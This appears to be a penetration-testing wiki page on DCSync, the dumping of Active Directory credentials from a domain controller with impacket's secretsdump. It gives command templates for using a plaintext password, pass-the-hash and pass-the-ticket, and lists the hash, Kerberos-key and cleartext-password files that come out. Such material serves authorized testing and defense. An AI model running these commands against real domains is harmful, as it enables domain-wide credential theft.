DCSync

How to find sensitive data using a DCSync.

Overview

A DCSync is similar to dumping a NTDS.dit file. However, rather than copying and extracting data from NTDS.dit, DCSync uses Windows APIs with the domain controller to replicate the domains data.

To conduct this account, a domain administrator is requried or a user with the privileges: DS-Replication-Get-Changes and DS-Replication-Get-Changes-All.

Remotely performing a DCSync

The easiest way to perform a DCSync is to use secretsdump.

secretsdump.py performs various techniques to dump password hashes and secrets.

https://github.com/fortra/impacket/blob/master/examples/secretsdump.py

DCSync using a plaintext password

secretsdump -outputfile 'data' <DOMAIN>/<USER>:<PASSWORD>@<DOMAINCONTROLLER>

DCSync using Pass-the-Hash

secretsdump -outputfile 'data' -hashes <LMhash>:<NThash> <DOMAIN>/<USER>@<DOMAINCONTROLLER>

DCSync using Pass-the-Ticket

secretsdump -k -outputfile 'data' <DOMAIN>/<USER>@<DOMAINCONTROLLER>

secretsdump output

The secretsdump script will output the following files from the DCSync:

.ntds
- LM and NT password hashes which can be used with hash cracking.
.cleartext
- Passwords stored using reversible encryption
.kerberos
- Kerberos keys (DES, AES128 and AES256)
.sam
- Domain controller's SAM secrets
.secrets
- Domain controller's LSA secrets

PreviousLSASS secrets NextDPAPI secrets

Last updated 4 months ago